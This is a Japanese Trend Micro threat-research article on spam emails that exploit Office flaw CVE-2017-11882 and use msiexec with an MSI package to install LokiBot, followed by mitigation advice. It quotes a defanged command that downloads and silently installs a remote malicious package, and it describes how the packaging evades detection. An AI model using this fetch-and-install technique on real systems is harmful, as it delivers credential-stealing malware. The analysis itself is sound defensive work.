Microsoft は 2017 年 11 月、遠隔でのコード実行が可能になる Microsoft Office の脆弱性「CVE-2017-11882」を修正する更新プログラムを公開しました。しかし、更新プログラム公開後にも「COBALT」のようなサイバー犯罪集団がこの脆弱性を利用して情報窃取型マルウェア「FAREIT」やオンライン銀行詐欺ツール「URSNIF」および「Loki」を改造した情報窃取型マルウェアのようなさまざまなマルウェアを拡散していたことが確認されています。Loki は当初、パスワードや仮想通貨ウォレットを窃取することのできるキーロガーとして販売されていたマルウェアです。
トレンドマイクロは 2018 年 1 月下旬、Windows のサービス「Windows Installer」を利用してマルウェアをインストールし、「CVE-2017-11882」を突く攻撃を確認しました。Windows Installer の実行ファイル “msiexec.exe” の利用はマルウェアのインストール方法としては珍しいものです。これまでの同脆弱性を突く攻撃では、Windows の実行ファイル “mshta.exe” を利用して PowerShell スクリプトを実行し、マルウェアをダウンロードしていました。PowerShell は Microsoft が開発したコマンドコンソールおよびスクリプト言語です。
■感染の流れ
図 1:感染の流れ
トレンドマイクロが解析した検体はスパムメール送信活動の一部だったようです。この攻撃は、メールの受信者から送信者に対する支払いの確認を要求するメールから始まります。本文には、「こんにちは。あなたの PC がウイルスや不正コードに感染していないか確認してください。」というウイルス感染の可能性について警告する内容が韓国語で書かれていました。また、このメールには “Payment copy.Doc”(「TROJ_CVE201711882.SM」として検出)という文書ファイルが添付されていました。支払い確認文書に偽装したこの添付ファイルは、実際は「CVE-2017-11882」を突くために利用されます。
図 2:脆弱性「CVE-2017-11882」を突く文書ファイルが添付されたスパムメール
図 3:文書ファイルの内容
この文書ファイルは「CVE-2017-11882」を突き、下記コマンドで Windows Installer を実行し、不正な 「Microsoft Windows Installer(MSI)パッケージ」である “zus.msi” をダウンロードおよびインストールします。
| Call cmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi” |
図 4:「msiexec」を利用したダウンロードおよびインストール
“msiexec.exe” がバイナリファイルのファイル名を “MSIFD83.tmp” に設定
図 5:インストール後の MSIL バイナリファイル
ダウンロードした MSI パッケージには、プログラミング言語「Delphi」で作成したバイナリファイルまたは強力な難読化を施した「Microsoft Intermediate Language(MSIL)」のバイナリファイルのいずれかが含まれています。MSI パッケージのダウンロード後、Windows Installer がバイナリファイルを PC にインストールします。これらのバイナリファイルは実際の不正コードを読み込むためのローダです。
この MSI パッケージについて注目すべき点は不正なバイナリファイルの圧縮レイヤになっている点です。ファイルスキャンエンジンが不正なバイナリファイルを検出するためには、この圧縮レイヤを 1 層ずつ処理する必要があります。圧縮は比較的簡単な手法ですが、不正コードは強力な難読化が施された MSIL のバイナリファイルまたは Delphi のバイナリファイルに含まれているため、特定および検出はより困難です。
インストールされたバイナリファイルは、ランダムな名前を付けた自身のインスタンスをもう 1 つ起動します。このインスタンスの内容は取り除かれ、不正コードに置き換えられます。
図 6:内容を取り除かれた MSIL をデバッグした結果
今のところ、上述の手法は「LokiBot」(「TROJ_LOKI.SMA」として検出)の拡散に利用されていることが確認されています。しかし、この手法はモジュール化されているため、他のマルウェアの拡散にも利用可能です。
図 7:確認された検体は「LokiBot」の亜種と特定
■新しいインストール手法が利用された理由
セキュリティ対策ソフトは、「WScript」や「PowerShell」のようなスクリプト、”mshta.exe” や “Winword.exe” のような実行ファイルのように、マルウェアのダウンロードおよびインストールに利用される一般的な手法に対する監視能力を向上させています。そのため、広く利用されているこれらの手法を介した脅威のブロックは容易になってきています。しかし、今回確認されたように、”msiexec.exe” を利用して不正な MSI パッケージをダウンロードする手法は一般的な手法ではないため検出が困難です。
ボット「Andromeda」(「ANDROM」ファミリとして検出)のように、”msiexec.exe” を利用する既存のマルウェアファミリもありますが、インストーラを利用する方法が異なります。Andromeda は更新プログラムと不正コードをダウンロードするために “msiexec.exe” にコードを注入します。もう 1 つの違いは、Andromeda は PE ファイルを直接ダウンロードして実行する点です。一方、今回解説した手法は、”msiexec.exe” がインストールパッケージとして認識する MSI パッケージによってマルウェアをインストールしていました。これにより、攻撃者が意図した通り、Windows Installer が利用されます。
“msiexec.exe” を利用するマルウェアのほとんどとは異なり、今回解析したマルウェアはバイナリファイルやプロセスを変更することなく Windows Installer の機能を利用してマルウェアをインストールします。「Potentially Unwanted Application(不正/迷惑アプリ、PUA)」をインストールするために、マルウェア自体ではなく MSI パッケージが悪用された点が、攻撃手法として新しい方向性です。
マルウェアをインストールするために、必ずしも MSI パッケージが必要というわけではありません。MSI パッケージが利用された理由は、従来のインストール手法に焦点を当てたセキュリティ対策ソフトによる検出を回避するためだと考えられます。今回、トレンドマイクロはいくつかの検体の検出に成功していますが、上述のような手法で拡散された検体かどうかは不明です。使用されていた言語から韓国の標的が狙われたと推測されています。また、今回確認された新しい手法のように、さまざまな拡散方法をテストしその効果を測っていた可能性もあります。
■被害に遭わないためには
今回の攻撃の主な拡散手法がフィッシングメールであることを考慮すると、個人および法人はメールからの脅威に対処するベストプラクティスに従うことで、今回の攻撃による影響を軽減することが可能です。
メールの内容にも注意を払ってください。例えば、支払い確認や覚えのない取引の配達に関するメールは疑ってかかる必要があります。違和感のあるメッセージや言い回しは危険信号です。今回の事例では、支払い確認のための添付ファイルに対して、ウイルスに感染していないか確認するように要求する本文がおかしな点でした。また、仕事上の取引に関するメールは注意深く書かれていることが多く、綴りの間違いや文法的な誤りが特にひどい場合はフィッシングメールの疑いがあります。
今回の攻撃に限定された対策として、Windows Installer の無効化または制限が挙げられます。これにより、ユーザの PC で不正なソフトウェアのインストールを防ぎ、システム管理者が許可したソフトウェアのみをインストールできるように設定することが可能です。
■トレンドマイクロの対策
トレンドマイクロのサーバ向け総合セキュリティ製品「Trend Micro Deep Security™」および「Trend Micro 脆弱性対策オプション」、ネットワークセキュリティ対策製品「TippingPoint」といった仮想パッチ機能を備えたソリューションは、更新プログラムが提供されていない脆弱性を悪用する脅威からエンドポイントを保護します。
トレンドマイクロ製品に組み込まれたクロスジェネレーション(XGen)セキュリティアプローチは、高度な機械学習型検索を活用しエンドポイントのデータとゲートウェイおよびアプリケーションを守ります。Web/URLフィルタリング、挙動解析、カスタムサンドボックスのような機能により、XGenは、従来の検出技術を回避し、既知、未知および未公開の脆弱性を突くことによって個人情報を窃取あるいは暗号化する今日の目的に特化した脅威からユーザを保護します。XGen は、エンドポイントセキュリティ、Hybrid Cloud Security、そしてNetwork Defenseのような製品に組み込まれています。
参考記事:
- 「Attack Using Windows Installer msiexec.exe leads to LokiBot」
by Martin Co and Gilbert Sison
翻訳: 澤山 高士(Core Technology Marketing, TrendLabs)
